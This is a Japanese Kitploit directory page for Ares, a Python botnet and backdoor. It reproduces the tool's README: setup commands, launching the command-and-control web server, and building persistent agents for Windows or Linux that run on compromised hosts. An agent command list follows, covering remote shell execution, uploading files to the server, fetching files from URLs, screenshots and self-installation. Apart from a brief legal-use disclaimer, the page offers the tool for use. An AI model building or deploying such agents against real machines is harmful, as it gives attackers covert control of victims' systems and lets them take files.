Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Ares — Python製ボットネットとバックドア | Kitploit
ツール/GitHubGitHub/sweetsoftware/ares
ペイロード生成永続化メカニズムポストエクスプロイトコマンド&コントロールリモートアクセスツール
GitHubsweetsoftware/ares

Ares

Python製ボットネットとバックドア

リポジトリを見る
1.6k4738年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Ares

AresはPython製のリモートアクセスツールです。

警告:本ソフトウェアは、お住まいの地域の法律に従ってのみ使用してください。本ソフトウェアの誤用は法的・倫理的問題を引き起こす可能性があり、私はそれを支持せず、責任を負いません。

Aresは2つの主要プログラムから構成されています:

  • コマンド&コントロールサーバー:エージェントを管理するWebインターフェース
  • エージェントプログラム:侵害されたホスト上で実行され、CNCとの通信を確保します

WebインターフェースはPythonが動作する任意のサーバーで実行可能です。エージェントはpyinstallerを使用してネイティブ実行可能ファイルにコンパイルできます。

セットアップ

Pythonの依存関係をインストール:

root@kitploit:~
pip install -r requirements.txt

データベースを初期化:

root@kitploit:~
cd server
./ares.py initdb

Linux上でWindows用エージェントをコンパイルするには、wineをセットアップします(オプション):

root@kitploit:~
./wine_setup.sh

サーバー

組み込み(デバッグ)サーバーで実行:

root@kitploit:~
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

またはgunicornを使用して実行:

root@kitploit:~
gunicorn ares:app -b 0.0.0.0:8080 --threads 20

サーバーは http://localhost:8080 でアクセスできるはずです。

エージェント

Pythonエージェントを実行(必要に応じてconfig.pyを更新):

root@kitploit:~
cd agent
./agent.py

スタンドアロンバイナリに新しいエージェントをビルド:

root@kitploit:~
./builder.py -p Linux --server http://localhost:8080 -o agent
./agent

サポートされているオプションの一覧を表示するには、./builder.py -hを実行してください。

root@kitploit:~
./agent/builder.py -h
usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
                  [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
                  [--max_failed_connections MAX_FAILED_CONNECTIONS]
                  [--persistent]

Builds an Ares agent.

optional arguments:
  -h, --help            show this help message and exit
  -p PLATFORM, --platform PLATFORM
                        Target platform (Windows, Linux).
  --server SERVER       Address of the CnC server (e.g http://localhost:8080).
  -o OUTPUT, --output OUTPUT
                        Output file name.
  --hello-interval HELLO_INTERVAL
                        Delay (in seconds) between each request to the CnC.
  --idle_time IDLE_TIME
                        Inactivity time (in seconds) after which to go idle.
                        In idle mode, the agent pulls commands less often
                        (every <hello_interval> seconds).
  --max_failed_connections MAX_FAILED_CONNECTIONS
                        The agent will self destruct if no contact with the
                        CnC can be made <max_failed_connections> times in a
                        row.
  --persistent          Automatically install the agent on first run.

サポートされているエージェントコマンド

root@kitploit:~
<any shell command>
Executes the command in a shell and return its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

screenshot
Takes a screenshot.

python <command|file>
Runs a Python command or local file.

persist
Installs the agent.

clean
Uninstalls the agent.

exit
Kills the agent.

help
This help.
ツールをダウンロード